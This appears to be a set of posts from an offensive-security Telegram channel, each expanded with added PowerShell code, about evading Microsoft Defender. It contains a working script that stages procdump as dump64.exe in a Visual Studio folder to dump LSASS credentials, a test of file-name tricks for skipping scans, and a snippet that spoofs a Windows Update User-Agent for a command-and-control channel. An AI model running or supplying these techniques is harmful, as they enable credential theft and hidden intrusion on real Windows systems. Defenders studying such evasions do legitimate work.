This channel discusses:

— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc

Disclaimer:
t.me/APT_Notes/6

Chat Link:
t.me/APT_Notes_PublicChat
Bypass Defender and dump LSASS via procdump.exe

If you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio\*" folder, you can bypass Defender and dump LSASS.

#lsass #dump #defender #bypass #dump64
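The procedure in the post above, written out as an added PowerShell example (this is not the channel author's code). It assumes Sysinternals procdump.exe is already staged at $src, that the shell is elevated, and that the subfolder under Visual Studio can be any name, since the post only gives "...\Microsoft Visual Studio\*". After the dump it checks the minidump signature and queries Defender's own detection history so you can see whether the attempt was recorded.

```powershell
# Added example, not from the APT_Notes post. Assumptions: procdump.exe is at $src,
# the shell is elevated, and the subfolder name under Visual Studio is arbitrary.
$src    = 'C:\Tools\procdump.exe'                                  # assumed staging path
$dstDir = 'C:\Program Files (x86)\Microsoft Visual Studio\Tools'   # assumed subfolder
$dst    = Join-Path $dstDir 'dump64.exe'                           # file name from the post
$out    = Join-Path $env:TEMP 'lsass.dmp'

if (-not (Test-Path $dstDir)) { New-Item -ItemType Directory -Path $dstDir | Out-Null }
Copy-Item -Path $src -Destination $dst -Force

# -ma writes a full memory dump; -accepteula suppresses the Sysinternals licence prompt.
& $dst -accepteula -ma lsass.exe $out

# A usable minidump starts with the ASCII signature 'MDMP'; anything else means the
# dump was blocked or truncated before it was finished.
if (Test-Path $out) {
    $magic = [System.Text.Encoding]::ASCII.GetString([System.IO.File]::ReadAllBytes($out)[0..3])
    if ($magic -eq 'MDMP') { "Dump OK: $out ($((Get-Item $out).Length) bytes)" }
    else                   { "File written but not a valid minidump (header: $magic)" }
} else {
    "No dump file written"
}

# What Defender recorded for this attempt (no output = nothing detected).
Get-MpThreatDetection |
    Where-Object { ($_.Resources -join ' ') -match 'dump64|lsass' } |
    Select-Object InitialDetectionTime, ThreatID, Resources

# Remove the staged binary; the dump itself stays in $env:TEMP until you delete it.
Remove-Item -Path $dst -Force
```

Whether the dump succeeds depends on the Defender build and ASR configuration on the target; run it on a test host first, and remember that the dump file on disk is itself a high-value artefact that should be moved and removed promptly.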
Bypass Defender AV static detection:

If you name a malicious file *.log, Defender doesn't scan it.

UPD:
DumpStack (with any file number) can bypass MDE easily with no detection, in Mimikatz or EICAR mode.
The malicious file is shown in the console but not identified as malicious.

#defender #evasion #tricks
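A way to check both claims above (the *.log extension and the DumpStack name) on your own Defender build, as an added PowerShell example that is not the channel author's code. It writes the standard EICAR test string under several file names, including a control name that real-time protection should always catch, waits, forces an on-demand scan of whatever survived, and then prints Defender's detection history. The directory and file names are chosen here for the test and are not from the post.

```powershell
# Added example, not from the APT_Notes post. Uses the standard EICAR test string so
# nothing harmful touches disk; file names are test choices, 'sample.com' is the control.
$eicar = 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
$dir   = Join-Path $env:TEMP 'defender-ext-test'
New-Item -ItemType Directory -Path $dir -Force | Out-Null

$names = 'sample.log', 'sample.txt', 'DumpStack.log', 'DumpStack.log.tmp', 'sample.com'

foreach ($n in $names) {
    $p = Join-Path $dir $n
    try {
        [System.IO.File]::WriteAllText($p, $eicar)     # real-time protection may act on close
    } catch {
        "$n : write blocked ($($_.Exception.Message))"
        continue
    }
    Start-Sleep -Seconds 3                              # give real-time protection a moment
    if (-not (Test-Path $p)) { "$n : removed by real-time protection"; continue }

    # Still on disk: ask for an explicit on-demand scan of just this file.
    Start-MpScan -ScanType CustomScan -ScanPath $p -ErrorAction SilentlyContinue
    if (Test-Path $p) { "$n : survived write and custom scan" }
    else              { "$n : removed by custom scan" }
}

# Defender's own record of what it flagged during the test.
Get-MpThreatDetection |
    Where-Object { ($_.Resources -join ' ') -like "*$dir*" } |
    Select-Object InitialDetectionTime, ThreatID, @{n='Files'; e={ $_.Resources -join '; ' }}
```

Read the output per name: if only the .com control is removed, the extension or name really is being skipped on that build; if every file is removed, the trick no longer holds for the signature set you are testing against. Results differ between Defender engine versions, so record the engine and platform version from Get-MpComputerStatus alongside the result.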
Red Team Tips

To get rid of Microsoft Defender's "behaviour-based" AMSI detection when opening an HTTPS C2 channel, it can help to play with the UserAgent parameter. For example, try a Windows Update User-Agent.

#redteam #tips #defender #bypass
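Where that parameter sits in practice, as an added PowerShell example rather than the channel author's code: the same HTTPS request made through System.Net.WebClient and through Invoke-WebRequest, each with an explicit User-Agent. The URL is a documentation placeholder and the User-Agent string is illustrative only; a real Windows Update User-Agent should be copied from captured traffic on the target build, not assumed from this snippet.

```powershell
# Added example, not from the APT_Notes post. $c2 is a TEST-NET-3 placeholder and $ua is
# an illustrative value; take the real string from Windows Update traffic on the target.
$c2 = 'https://203.0.113.10/update'
$ua = 'Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.0'

# WebClient: works the same in Windows PowerShell 5.1 and PowerShell 7.
$wc = New-Object System.Net.WebClient
$wc.Headers.Add('User-Agent', $ua)
$body = $wc.DownloadString($c2)

# Invoke-WebRequest: the -UserAgent parameter replaces the default PowerShell UA.
$resp = Invoke-WebRequest -Uri $c2 -UserAgent $ua -UseBasicParsing
$resp.Content
```

Changing the header only changes what the proxy or TLS-inspecting sensor sees in the request line; the process making the connection, its parent, and the destination are still logged, so treat this as one knob among several rather than a complete bypass.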